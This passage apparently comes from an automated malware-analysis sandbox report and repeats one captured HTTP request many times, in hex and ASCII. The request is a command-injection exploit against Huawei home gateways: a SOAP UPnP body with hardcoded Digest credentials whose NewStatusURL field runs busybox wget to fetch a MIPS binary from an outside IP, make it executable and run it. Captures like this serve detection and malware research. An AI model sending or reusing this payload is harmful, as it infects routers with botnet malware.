20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary 